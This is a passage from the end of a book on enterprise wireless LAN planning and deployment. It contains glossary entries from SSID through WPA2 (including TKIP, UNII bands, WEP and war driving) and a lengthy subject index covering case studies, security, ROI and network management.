wireless LAN (WLAN). SSIDs can be thought of as the "network name," and they are commonly
used by network users to recognize specific wireless LANs. In enterprise WLANs, the same SSID is
usually shared among all access points. This allows a client device to recognize the WLAN as the
same logical network as it roams from AP to AP.
Furthermore, access points can support more than one SSID. This allows an enterprise WLAN, for
example, to have two or three different SSIDs, with different security settings, available on the
same access points. Common examples would be a WLAN with different SSIDs for laptop users,
wireless phone users, and perhaps guest users.

STA
Station. Any device that has a wireless network interface. All wireless clients and access points can
be considered stations.

Station
See STA.

Supplicant
A client role in the 802.1x framework. This is basically the client device (or user) that wants to be
authenticated for access to the network. Supplicant is a term used to describe the device that is
attempting to access the network in an authentication event.

T
TCO
Total cost of ownership. The complete costs of owning a product, system, or service. Total cost of
ownership will include the capital acquisition cost, installation, maintenance, training, technical
support, and labor to make required changes to related products, systems, or services. Most
estimates place the TCO at about three to four times the capital acquisition price for the product,
system, or service.

TKIP
Temporal Key Integrity Protocol. TKIP is an encryption protocol that adds a function whereby each
packet is rehashed as part of the Message Integrity Check (MIC). A hashing function is used to
provide a new key for each packet, thereby greatly increasing the security when compared to the
static keys offered by WEP. TKIP utilizes the RC4 stream cipher with 128-bit keys for encryption
and 64-bit keys for authentication. TKIP is a fundamental part of WPA, WPA2, and 802.11i.

Total cost of ownership
See TCO.

U
UNII
Unlicensed National Information Infrastructure. The Unlicensed National Information Infrastructure
(UNII) bands have three groupings, with different frequency ranges, maximum transmit power,
and permitted transmission areas.

Band      Frequency          Area
UNII-1    5.15-5.25 GHz      Outdoor use only
UNII-2    5.25-5.35 GHz      Indoor and outdoor use
UNII-3    5.725-5.825 GHz    Indoor and outdoor use

user
In the context of this book, a person who uses a wireless client.

V
VLAN
Virtual LAN. A MAC layer network segmentation that logically binds devices to the same LAN,
regardless of their physical location.

VoIP
Voice over IP. A networking standard that allows voice telephony services over IP connections.

VPN
Virtual private network. The use of encryption protocols in the lower protocol layers to provide a
secure connection through an otherwise insecure network, typically the Internet. VPNs are also
referred to as secure tunnels.

W
war driving
The act of collecting data on unsecured or poorly secured WLANs while driving. Depending on the
mode of transportation, this can also be known as war walking, war flying, and so on. The intent of
war driving is to identify potential security weaknesses and make public the information or access
the network for hacking or "free" Internet services.

war walking
Conceptually identical to war driving, but carried out on foot.

WECA
Wireless Ethernet Compatibility Alliance. The former name of the Wi-Fi Alliance.

WEP
Wired Equivalent Privacy (WEP) protocol. An encryption standard that defines mechanisms for data
transmitted in WLANs. WEP is based on an RC4 algorithm and originally used 40-bit keys but was
later enhanced to support 128-bit keys. Subsequently, proprietary 256-bit implementations were
introduced by many equipment manufacturers.

Wi-Fi
Wireless Fidelity. Wi-Fi is a brand name created by the Wi-Fi Alliance (formerly WECA, the Wireless
Ethernet Compatibility Alliance) to describe interoperable and standards-based 802.11 wireless
networks and to promote the use and public adoption of wireless networks. WLAN products that
are Wi-Fi certified are interoperable and compliant with the latest standards set down by the Wi-Fi
Alliance. The Wi-Fi Alliance has instituted a test suite that defines how member products are tested
to certify that they are interoperable with other Wi-Fi certified products. These tests are conducted
at an independent laboratory.

Wi-Fi Alliance
The Wi-Fi Alliance is a global, cross-industry organization created in 1999 to promote
interoperability, certify products as compliant with the latest standards, and ensure independent
testing. Note that the Wi-Fi Alliance does not define standards but simply adopts them as part of
the Wi-Fi certification.

Wi-Max
Worldwide Interoperability for Microwave Access. Wi-Max is an 802.16 standards-based technology
to provide broadband wireless "last mile" connectivity. As a wide-area technology, Wi-Max (and all
802.16 standards) lies outside the scope of this book.

WLAN
Wireless LAN. A wireless network where clients and access points communicate, most commonly
using standard IEEE-defined communication protocols, such as 802.11a, 802.11b, or 802.11g.

WPA
Wi-Fi Protected Access. WPA is a standards-based, interoperable security enhancement that
provides significantly improved levels of data protection and access control for WLAN systems,
compared to WEP. WPA introduces several new enhancements, including TKIP, MIC, and Key
Management.

WPA2
Wi-Fi Protected Access 2. WPA2 is the Wi-Fi Alliance's marketing term for 802.11i. As such, its
capabilities are the same. See also 802.11i.

Index
[SYMBOL] [A] [B] [C] [D] [E] [F] [G] [H] [I] [L] [M] [N] [O] [P] [R] [S] [T] [U] [V] [W]

802.11 standards
802.11a standard
802.11g standard, preratification
802.11i authentication standard
802.1x authentication standard

AAA (authentication, authorization, and accounting)
access
access layer (hierarchical networks)
access points versus access layer
access technologies
accounting management
ACS (Cisco Secure Access Control Servers)
ACU (Aironet Client Utility)
ad-hoc WLAN networks
AES (Advanced Encryption Standard)
aggregate annualized monetary benefit, calculating
alerts
analytical processes
AP (access points)
client-to-AP ratio 2nd
configuring
Griffith University case study 2nd
directional antennas
installing
Layer 2 address spoofing, preventing
management policy, implementing
outdoor coverage
physical security
rogue 2nd
detecting 2nd
responding to
securing 2nd
signal strength
minimizing
SSID
testing
application layer
application matrices
architectural guidelines
checklist
defining scope of WLAN
deployment timeframe
infrastructure requirements
Lifespan case study
operational support structure, establishing
requirements, assessing
802.11 standards
client-to-AP ratio
global naming standards
radio cell architecture
roaming
signal strength
topology
security posture 2nd
target audience of WLAN
understanding goal of WLAN
ASD (application specific devices)
assessing WLAN architecture requirements
802.11 standards
client-to-AP ratio
global naming standards
radio cell architecture
roaming
signal strength
topology
asset tags 2nd
battery life
assets, TCO
per-user
Value Chain framework
attenuation
authentication 2nd
802.11i
802.1x
EAP
machine-based
mitigating security threats 2nd
user-based
WPA
automatic site surveys
autonomous AP architecture
availability of AAA
average monthly benefit per user, calculating

bandwidth
as limitation of WLANs
factors influencing
antennas
attenuation
distortion
interference
modulation
multipath
path loss
power
base station model
battery life of asset tags
BBSM (Building Broadband Services Manager)
benchmarking
benefits of global WLAN solution
broadcasting video
budgetary requirements, estimating
building secure WLANs, best practices
"built-in" traffic analysis tools
bus topology
business model
for WLAN deployment
Griffith University education case study
Lifespan case study
manufacturing industry case study

cabling, Griffith University case study
CAGRs (compounded annual growth rates)
calculating
aggregate annualized monetary benefit of WLANs
average monthly benefit per user
daily organizational productivity
IRR
monetized productivity benefit per WLAN
NPV 2nd
office employee productivity benefits
payback period
ROI
total productivity benefit of WLANs
traveling employee productivity benefits
calculating location, methods of
canned reports
case studies
business model
client management
deployment issues
education, Griffith University
AP configuration
AP settings
benefits, measuring
best practices
business model
cabling
challenges faced
client management
global naming standards
network management
phases of deployment
project management
radio cell architecture
security
signal strength
site surveys
"Smart Zones,"
three-tiered service and support system
topology
wireless equipment
WLAN standards
enhanced services
wireless guest networking
wireless voice services
healthcare
architectural principles
business model
enterprise WLAN deployment
network management
patient tracking and telemetry
RFID technology
security
site surveys, performing
WLAN design
manufacturing industry
business model
coverage
guest access
rogue AP detection
security concerns
throughput
VoIP
WLAN deployment
security
technology considerations
architectural requirements
client management
network management
service and support
CBC-MAC (Cipher Block Chaining Message Authentication Code)
CCX (Cisco Client Extensions) 2nd
CCX (Cisco Compatible Extension) program
CDMA (Code Division Multiple Access)
cellular telephone networks, LBS
centralized management model versus distributed management model
centralized self-service model
centrally funded deployment strategies
Christensen, Clayton
Cisco Aironet 350 Series Access Point
Cisco four-tier support model
Cisco NexGen WLAN project
Cisco Wireless IP Phone 7920
client management 2nd 3rd
Griffith University case study
manual client configuration
client security
client software
client to access point ratio
client-based reporting
client-funded deployment strategies
client-to-AP ratio 2nd
clients checklist
coexistence of IEEE standards
collaborative processes
communication plan, implementing
comparing
centralized and distributed management models
in-house deployment versus outsourced deployment
wired and wireless LANs 2nd
complementary services (WLANs)
compute assets
configuration management
manual client configuration
configuring APs
consumer retail industry, identifying key application areas in Value Chain framework
convenience as benefit of WLANs
core layer (hierarchical networks)
CoS (class of service)
cost of support
cost savings of WLANs
cost-benefit analysis
of hybrid wired and wireless LANs
of wired-only LANs
of wireless-only LANs
CPOM (Computer Physician Order Management) application
CSMA (Carrier Sense Multiple Access)
CSMA/CA (Carrier Sense Multiple Access/Collision Avoidance)

Daemen, Joan
daily organizational productivity, calculating
data link layer
defining
home wireless networking policies 2nd
security policy
deploying
enterprise WLANs
AAA architecture dependencies
architecture scalability
business model
case study
communication plan
impact on application portfolio
in manufacturing setting
Lifespan healthcare case study
methodology and project planning checklist
planning phase 2nd
preparation phase 2nd
regulatory issues
security standards
support plan
timeframe as architectural component
guest networks
reasons for
WLAN location services
in transport and shipping companies
deployment checklist 2nd
for architecture
for clients
for deployment methodology and project planning
for infrastructure
design considerations
client-to-AP ratio
roaming
detecting rogue APs
developing project plan
directional antennas
discount rate, selecting
disruptive technology
distortion
distributed management model versus centralized management model
distribution layer (hierarchical networks)
distribution mechanism of video traffic
DMZ
documents, developing project plan
DSSS (Direct Sequence Spread Spectrum) 2nd
dual-band devices
duplex technologies

EAP (Extensible Authentication Protocol)
EAP-FAST (Flexible Authentication via Secure Tunneling) 2nd
EAP-LEAP (Lightweight Extensible Authentication Protocol)
edge devices
edge layer (hierarchical networks)
education case study
AP configuration
AP settings
benefits, measuring
best practices
business model
cabling
challenges faced
client management
global naming standards
network management
phases of deployment
project management
radio cell architecture
security
signal strength
site surveys
"Smart Zones,"
three-tiered service and support system
topology
wireless equipment
WLAN standards
employee productivity, impact of WLANs
encoding methods
encryption
AES
mitigating security threats
WEP
enhanced services
wireless guest networking
wireless voice services
entertainment/leisure industries, deploying WLAN location services
environmental factors affecting WLAN deployment
governmental
physical attributes of surroundings
RF environment
estimating
budgetary requirements
resource requirements
ETSI (European Telecommunications Standards Institute)
extending coverage outdoors

facilitating value creation process, top-down approach
fan-out ratio
fast Layer 2 roaming
fast roaming
FCAPS
accounting management
configuration management
limitations of
performance management
security management
FCC (Federal Communications Commission)
FDMA (Frequency Division Multiple Access)
financial services industry, identifying key application areas in Value Chain framework
four-tier support model
frequency division duplexing
friendly rogues
FUD (Fear, Uncertainty, Doubt) factor
funding strategies
centrally funded
client-funded
group funded
subscription funded
future of WLANs

global naming standards
Griffith University case study
goal of WLANs as architectural component
Gore, Rich
governmental considerations
"gray IT" deployments
GRE
Griffith University case study
AP configuration
AP settings
benefits, measuring
best practices
business model
cabling
challenges faced
client management
global naming standards
network management
phases of deployment
project management
radio cell architecture
security
signal strength
site surveys
"Smart Zones,"
three-tiered service and support system
topology
wireless equipment
WLAN standards
group-funded deployment strategies
guest access on manufacturing company enterprise WLAN
guest networking
implementing
reasons for deploying
requirements for 2nd
SSIDs
guest user class

hackers, profile of
hashing
TKIP
HCF (Hybrid Coordination Function)
healthcare industry, deploying WLAN location services
heat maps
Hemendinger, David
hierarchical network model
hierarchy of organizational needs
"high bandwidth" applications
HIPAA (Health Insurance Portability and Accountability Act of 1996)
history of WLANs
home wireless networking policies, defining 2nd
host management
hot-desk user class

identifying risks 2nd
IDS (intrusion detection systems)
IEEE (Institute for Electrical and Electronics Engineers)
coexistence
IEEE 802.11b standard
IEEE 802.11g standard 2nd
implementing
AP management policies
communication plan
guest networks
voice on WLANs
WLAN video
implementing enterprise WLANs
case study
in-house deployment versus outsourced deployment
in-house management
infrastructure checklist
infrastructure layer
asset classes
security
authentication
encryption
hashing
network admission control
infrastructure management
infrastructure mode
infrastructure requirements for WLAN deployment
connectivity
console access
power
installing APs
interception of transmitted data
interference
medical field standards
intermittent connectivity of mobile endpoints
internally developed tools
inventory taking, enhancing effectiveness through WLAN location services
investment in IT infrastructure
investments
IRR, calculating
NPV, calculating 2nd
payback period, calculating
ROI
calculating
IRR (internal rate of return)
calculating
isotropic antennae
IT infrastructure, investment in

launching production services
Law of Large Numbers
Layer 1
Layer 2
address spoofing, preventing
Layer 3
Layer 4
Layer 5
Layer 6
Layer 7
layers of hierarchical network model
LBS (location-based services) 2nd 3rd
legal liability protection as motivation for guest networks
legislation, Sarbanes-Oxley Act
Lifespan healthcare case study
architectural principles
business model
CPOM
enterprise WLAN deployment
network management
patient tracking and telemetry
RFID technology
security
site surveys, performing
WLAN design
disaster recovery
guest networking
RF and interference
limitations of FCAPS
LLC sublayer
location tags
location, methods of calculating
"low bandwidth" applications
LWAPP (Lightweight Access Point Protocol)

MAC sublayer
machine-based authentication
malicious hackers, profile of
man-in-the-middle attacks
management strategies
for clients
for infrastructure
in-house management
outsourced management
user expectations of WLAN video
management tools
third-party WLAN management tools
vendor-specific WLAN management tools
manual site surveys
manufacturing industry
case study
business model 2nd
coverage
guest access
rogue AP detection
security concerns
throughput
VoIP
WLAN deployment
deploying WLAN location services
Value Chain framework, identifying key application areas
Maslow, Abraham
measuring benefits of WLAN deployment in a university setting
medical industry, interference standards
Meetinghouse Data Communications
mesh topology
Microsoft Excel, calculating NPV
minimizing AP signal strength
mitigating security threats
with authentication 2nd
802.11i standard
802.1x
WPA
with encryption
with hashing, TKIP
mobile devices, securing
mobile endpoints
intermittent connectivity
mobile user class
mobility
as benefit of WLANs
value of 2nd
modulation
monetized productivity benefit per WLAN, calculating
multipath
multiple access WLAN technologies
multiplex technologies
DSSS
OFDM

Negroponte, Nicholas
NEMA (National Electrical Manufacturers Association) enclosures
NetFlow
network admission control
network layer
network management
Griffith University case study
Lifespan case study
platforms
tools
built-in tools
internally developed tools
NetFlow
RADIUS accounting
SNMP
syslog
unique challenges to
dynamic nature of transport medium
intermittent connectivity of mobile endpoints
mobile nature of wireless endpoints
mobility of endpoints
network-based rogue AP detection
NexGen WLAN project
noise
non-overlapping channels
NPV (net present value)
calculating

OFDM (Orthogonal Frequency Division Multiplexing)
office employee productivity benefits, calculating
office space, security
on-demand viewing
operational support structure, establishing
organizational ecosystem
OSI reference model
application layer
data link layer
network layer
physical layer
presentation layer
session layer
transport layer
out-of-band management
outdoor coverage
outsourced deployment versus in-house deployment
outsourced WLAN management
overlay security solutions

patient tracking and telemetry, Lifespan healthcare case study
"pay as you go" deployment strategy
payback period
calculating
PCAOB (Public Company Accounting Oversight Board)
peer layers
per-user TCO
performance management
performing site surveys for Lifespan healthcare WLAN
phases of deployment, Griffith University case study
physical layer
physical locations
physical security of office space
placement of WLANs
planning phase of solutions lifecycle
architecture scalability
defining high-level program plan
design considerations
documenting project stakeholders
environmental considerations
governmental regulations
identifying users
impact on application portfolio
security strategy
PMBOK (Project Management Body of Knowledge)
PoE (Power over Ethernet)
Porter, Michael E.
Post Implementation Review
post-installation acceptance test
PPDIOO solutions lifecycle 2nd
planning phase
architectural considerations 2nd 3rd
defining high-level program plan
design considerations
documenting project stakeholders
environmental considerations
governmental regulations
identifying users
impact on application portfolio
security strategy
preparation phase
environmental factors
funding strategies
identifying scope of deployment
infrastructure requirements 2nd
pre-deployment tasks
preparation phase of solutions lifecycle
environmental factors
funding strategies
identifying scope of deployment
infrastructure requirements
connectivity
console access
power
presentation layer
preventing Layer 2 address spoofing
primary users
probabilistic nature of WLANs
product demonstrations, accessing through guest networks
production services, launching
productivity
average monthly benefit per user, calculating
daily organizational productivity, calculating
impact of WLANs
monetized productivity benefit per WLAN, calculating
office employee benefits, calculating
total productivity benefit of WLANs, calculating
traveling employee benefits, calculating
profiles
project board
project management, Griffith University case study
project plan, developing

radio cell architecture
Griffith University case study
radio side protection
radio-based rogue AP detection
RADIUS accounting
real-time video streaming applications
regulatory agencies
regulatory requirements
restrictions on enterprise WLANs
remote access, defining home wireless networking policies 2nd
Renaud, David
requirements for guest networking 2nd
resource requirements, estimating
responding to rogue APs
RF devices, regulations
RF environment
RF fingerprinting
RF management
RF Prediction
RF triangulation
RFID (Radio Frequency Identification)
Lifespan healthcare case study
Rijmen, Vincent
Rijndael
ring topology
risks, identifying
road warriors
roaming 2nd
fast Layer 2 roaming
roaming user class
rogue APs 2nd 3rd
detecting 2nd
on manufacturing company enterprise WLAN
responding to
ROI (return on investment) 2nd 3rd

scalability of AAA
scope of WLAN as architectural component
Scott, Bruce 2nd
secondary users
security
alerts
as architectural component
as reason for guest network deployment
authentication 2nd
EAP
client security
encryption
Griffith University case study
hashing
IDSs
Lifespan case study
manufacturing industry case study
mobile devices
network admission control
security management
security models
encryption and authentication with overlay security solutions
machine-based authentication
native authentication only
native encryption and authentication
native encryption only
no authentication, encryption, or hashing
user-based authentication
security policies, defining
security settings management
centralized self-service model
manual client configuration
profiles
standardization
third-party wireless software
selecting
discount rate
in-house versus outsourced deployment
self-actualization
self-healing WLANs
self-throttling throughput strategy
service and support
Cisco four-tier support model
cost of
session layer
signal strength requirements, assessing
signal strength, Griffith University education case study
single points of failure, effect on scalability
site surveys
Griffith University case study
Lifespan healthcare case study
"Smart Zones"
Griffith University education case study
sniffing
SNMP (Simple Network Management Protocol)
soft benefits
software, third-party
solutions lifecycle
planning phase
architecture scalability
defining high-level program plan
documenting project stakeholders
identifying users
impact on application portfolio
security strategy
preparation phase
environmental factors
funding
identifying scope of deployment
infrastructure requirements 2nd
SOX (Sarbanes-Oxley Act)
SSIDs (Service Set Identifiers)
on guest networks
SSO (single sign-on)
stakeholders
standard business applications
standard user class
standardization
standards
coexistence
IEEE 802.11a
IEEE 802.11b
IEEE 802.11g
pre-ratification
star topology
storage assets
strategic value of wireless networking
subscription-funded deployment strategies
sunk costs
supplementary services
video
voice
syslog

target audience of WLAN as architectural component
TCO (total cost of ownership)
per user
Value Chain framework
identifying key application areas
identifying secondary application areas
TDMA (Time Division Multiple Access)
technical support
tertiary institutions
testing APs
third-party tools
wireless client software
WLAN management tools
threats to security
interception
mitigating
with authentication 2nd
with encryption
with hashing
rogue APs
three-tiered service and support system, Griffith University case study
throughput, self-throttling strategy
tiered support structure 2nd
time division duplexing
TKIP (Temporal Key Integrity Protocol)
top-down approach to facilitating value creation process 2nd
topological considerations for WLAN deployment
topologies, Griffith University education case study
total productivity benefit of WLANs, calculating
tracking and telemetry, Lifespan healthcare case study
traffic, sniffing
transactional processes
transmit channels
transport and shipping companies, deploying WLAN location services
transport assets
transport layer
traveling employee productivity benefits, calculating
trend reporting 2nd
trusted WLANs 2nd
types of WLAN users

unaware employees as security threat
unfriendly rogues
UNII (Unlicensed National Information Infrastructure) band
unique challenges to WLAN management
dynamic nature of transport medium
intermittent connectivity of mobile endpoints
mobile nature of wireless endpoints
untrusted wireless networks 2nd
user-based authentication

Value Chain framework
identifying key application areas
identifying secondary application areas
value creation process, facilitating with top-down approach 2nd
vendor-specific WLAN management tools
video technologies
broadcasting
distribution mechanism
implementing
on-demand
real-time streaming applications
user expectations, managing
visualization tools
voice technologies
WLAN voice, implementing
VoIP, implementing on manufacturing company enterprise WLAN

WACC (Weighted Average Cost of Capital)
war driving
WECA (Wireless Ethernet Compatibility Alliance)
WEP (Wired Equivalent Privacy)
WIDS (wireless intrusion detection system)
wired networks
wireless equipment, Griffith University case study
wireless guest networking
wireless voice services
WLAN location services 2nd
asset tags
components of
deploying
inventory taking
methods of calculating location
privacy issues
rationale for
WLANs
complementary services
history of
standards, Griffith University education case study
topology, Lifespan case study
video, managing user expectations
voice devices
voice implementation
WLSE (Cisco Wireless LAN Solution Engine) 2nd
WMM (Wi-Fi Multimedia) standard 2nd
workgroup switches
working groups (IEEE)
WPA (Wi-Fi Protected Access)